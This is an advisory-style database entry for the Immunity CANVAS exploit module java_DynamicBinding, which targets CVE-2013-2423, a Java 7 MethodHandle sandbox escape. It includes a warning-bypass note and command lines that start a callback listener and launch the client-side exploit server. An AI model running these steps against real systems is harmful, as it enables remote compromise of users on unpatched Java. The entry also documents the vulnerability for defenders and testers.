Immunity Canvas: JAVA_DYNAMICBINDING

2013-04-17T18:55:00
ID JAVA_DYNAMICBINDING
Type canvas
Reporter Immunity Canvas
Modified 2013-04-17T18:55:00

Description

Name| java_DynamicBinding
---|---
CVE| CVE-2013-2423
Exploit Pack| CANVAS
Description| java_DynamicBinding
Notes| CVE Name: CVE-2013-2423
VENDOR: Sun
Notes:
A vulnerability in MethodHandle allows public final fields to be overwritten.
This can be abused to disable the Java sandbox.

The current exploit also includes a Java Security Warning bypass that works for Java 7 update 10 up to update 17.

Affected versions:
JDK and JRE 7 Update 17 and earlier

Tested on:
- Windows 7 with JDK/JRE 7 update 17 on Firefox, Chrome and IE

To run from the command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17

And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_DynamicBinding -O allowed_recon_modules:js_recon -O auto_detect_exploits:0

Repeatability: Infinite (client side - no crash)
References: http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2423
Date public: 04/17/2013